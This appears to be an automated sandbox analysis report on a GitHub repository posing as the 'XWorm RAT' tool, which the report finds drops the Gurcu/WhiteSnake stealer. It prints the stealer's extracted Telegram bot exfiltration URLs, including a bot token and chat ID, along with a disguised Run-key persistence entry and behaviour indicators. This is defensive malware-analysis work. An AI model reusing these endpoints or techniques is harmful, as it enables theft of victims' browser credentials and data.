gurcu | hxxps://github[.]com/Intestio/XWorm-RAT

Analysis

max time kernel
406s
max time network
406s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08/01/2025, 16:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Intestio/XWorm-RAT

Score

10^/10

gurcu discovery persistence phishing spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: leaflet-easybutton@2
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	Command Reciever.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	Command Reciever.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	conhost.exe

Executes dropped EXE 4 IoCs

pid	Process
2108	Command Reciever.exe
1652	conhost.exe
5960	Command Reciever.exe
5316	conhost.exe

Loads dropped DLL 4 IoCs

pid	Process
2108	Command Reciever.exe
1652	conhost.exe
5960	Command Reciever.exe
5316	conhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdate\\conhost.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
126	raw.githubusercontent.com
128	raw.githubusercontent.com
132	raw.githubusercontent.com
151	raw.githubusercontent.com
153	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
124	ip-api.com
149	ip-api.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4680	tasklist.exe
5260	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	conhost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1736	timeout.exe
5364	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5360	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3408	msedge.exe
3408	msedge.exe
2788	msedge.exe
2788	msedge.exe
2940	identity_helper.exe
2940	identity_helper.exe
4400	msedge.exe
4400	msedge.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2108	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
1652	conhost.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
2920	Command Reciever.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5900	Command Reciever.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2108	Command Reciever.exe
Token: SeDebugPrivilege	4680	tasklist.exe
Token: SeDebugPrivilege	1652	conhost.exe
Token: SeDebugPrivilege	5960	Command Reciever.exe
Token: SeDebugPrivilege	5260	tasklist.exe
Token: SeDebugPrivilege	5316	conhost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2788	msedge.exe
2920	Command Reciever.exe
2920	Command Reciever.exe
5900	Command Reciever.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1652	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2788 wrote to memory of 1648	2788	msedge.exe	83
PID 2788 wrote to memory of 1648	2788	msedge.exe	83
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 832	2788	msedge.exe	84
PID 2788 wrote to memory of 3408	2788	msedge.exe	85
PID 2788 wrote to memory of 3408	2788	msedge.exe	85
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86
PID 2788 wrote to memory of 2280	2788	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Intestio/XWorm-RAT
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd7c1246f8,0x7ffd7c124708,0x7ffd7c124718
  2⤵
  PID:1648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
  2⤵
  PID:832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
  2⤵
  PID:2280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:4576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:4040
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
  2⤵
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  PID:1324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:4644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
  2⤵
  PID:4048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
  2⤵
  PID:2664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4776 /prefetch:2
  2⤵
  PID:5396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:1
  2⤵
  PID:5880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1776 /prefetch:1
  2⤵
  PID:6044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
  2⤵
  PID:6068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2080 /prefetch:1
  2⤵
  PID:4640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9959520025566405600,15679191775406409018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
  2⤵
  PID:2076

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5072

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3416

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3456

C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4404
- C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SendNotifyMessage
  PID:2920
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp6EB3.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp6EB3.tmp.bat
    3⤵
    PID:836
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:1904
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 2108"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4680
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:3676
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1736
  - - C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe
      "C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1652
